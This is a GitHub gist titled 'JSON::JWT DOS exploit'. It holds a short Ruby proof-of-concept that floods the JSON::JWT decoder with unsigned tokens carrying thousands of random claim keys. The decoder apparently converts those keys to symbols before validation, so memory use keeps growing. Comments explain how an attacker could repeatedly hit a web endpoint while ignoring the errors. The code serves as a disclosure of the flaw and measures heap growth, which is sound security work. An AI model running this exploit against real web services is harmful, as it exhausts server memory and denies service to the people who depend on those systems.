-
-
Save stouset/06e37f1bb84295294985 to your computer and use it in GitHub Desktop.
JSON::JWT DOS exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
p GC.stat # note heap_used, heap_length, and particularly heap_live_num | |
random = Random.new | |
key = random.bytes(256 / 8) | |
10_000.times do | |
# construct a hash with 10_000 garbage keys; they can be strings here and the | |
# JWT decoder will happily convert them to symbols regardless | |
claims = 10_000.times.each_with_object({}) do |_, h| | |
h[ random.bytes(16) ] = 1 | |
end | |
# convert it to a JWT; they don't even have to be signed, because the decoder | |
# converts string keys to symbols before even validating the JWT | |
jwt = JSON::JWT.new(claims) | |
# we swallow errors because, in practice, an attacker can just repeatedly hit | |
# your webserver endpoint and ignore the fact that you've failed to decode the | |
# JWT | |
JSON::JWT.decode(jwt.to_s, key) rescue nil | |
end | |
# let the above run as long as you feel like | |
GC.start | |
p GC.stat # note heap_used, heap_length, and particularly heap_live_num |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment